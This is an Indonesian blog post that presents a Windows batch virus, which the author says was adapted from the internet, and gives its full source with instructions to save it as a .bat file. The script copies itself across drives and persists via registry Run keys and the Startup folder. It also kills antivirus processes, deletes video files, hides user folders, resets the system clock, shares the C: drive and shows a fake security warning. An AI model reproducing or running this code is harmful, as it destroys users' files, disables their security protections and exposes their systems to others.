Rabu, 07 November 2012

Contoh Virus Batch (Kid)

Berikut ini adalah contoh script virus sederhana dari internet yang saya rubah dan tambahkan beberapa scriptnya.

Fungsinya tidak lain adalah :
  • Membuat file duplikasi dirinya di direktori root hardisk
  • Membuat dapat berjalan pada saat komputer hidup
  • Meng-kill beberapa aplikasi antivirus
  • Menghapus file video pada saat virus dieksekusi atau autorun dengan format tertentu di folder My Videos
  • Menyembunyikan folder My Music & My Pictures
  • Mengganti jam sistem
  • Tidak aktif terus-terusan, hanya pada saat autorun saja
Scriptnya
=========================================================================
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls

echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001
Copy %0 %SystemRoot%\system32\1001\kid.bat
echo msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
at 12:34 /interactive “%SystemRoot%\system32\1001\kid.bat”
at 12:35 /interactive “%SystemRoot%\system32\1001\kid.bat”
msg * “KOmputer Ini Diserang Oleh GU3 4D1” > nul

taskkill /F /IM ESET.exe
taskkill /F /IM AVG.exe
taskkill /F /IM Kapersky.exe
taskkill /F /IM Norton.exe
taskkill /F /IM PCMAV.exe
taskkill /F /IM CLAMAV.exe
taskkill /F /IM SM?RTP.exe

copy %0 C:\system_file.bat
copy %0 d:\system_file.bat
copy %0 e:\system_file.bat
copy %0 f:\system_file.bat
copy %0 g:\system_file.bat
copy %0 h:\system_file.bat
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

cd\
cd %systemroot%\system32
copy %0 %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\kid.exe
reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\kid.exe /f

copy %0 %systemroot%\system32\kid.bat
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Showsuperhidden /t reg_dword /d 0 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\policies\explorer /v nofolderoption /t reg_dword /d 1 /f
REG ADD HKCU\software\Microsoft\windows\currentversion\run /v aktifkan /t reg_SZ /d C:\system_file.bat /f

attrib +h +s "%userprofile%\my documents\my music"
attrib +h +s "%userprofile%\my documents\my pictures"

del "%userprofile%\my documents\my videos\*.3gp"
del "%userprofile%\my documents\my videos\*.mkv"
del "%userprofile%\my documents\my videos\*.avi"
del d:\*.3gp
del e:\*.3gp
del f:\*.3gp
del d:\*.avi
del e:\*.avi
del f:\*.avi
del d:\*.mkv
del e:\*.mkv
del f:\*.mkv
=========================================================================

Copy-kan script tadi ke notepad lalu save file tadi ke format .bat

Tidak ada komentar:

Posting Komentar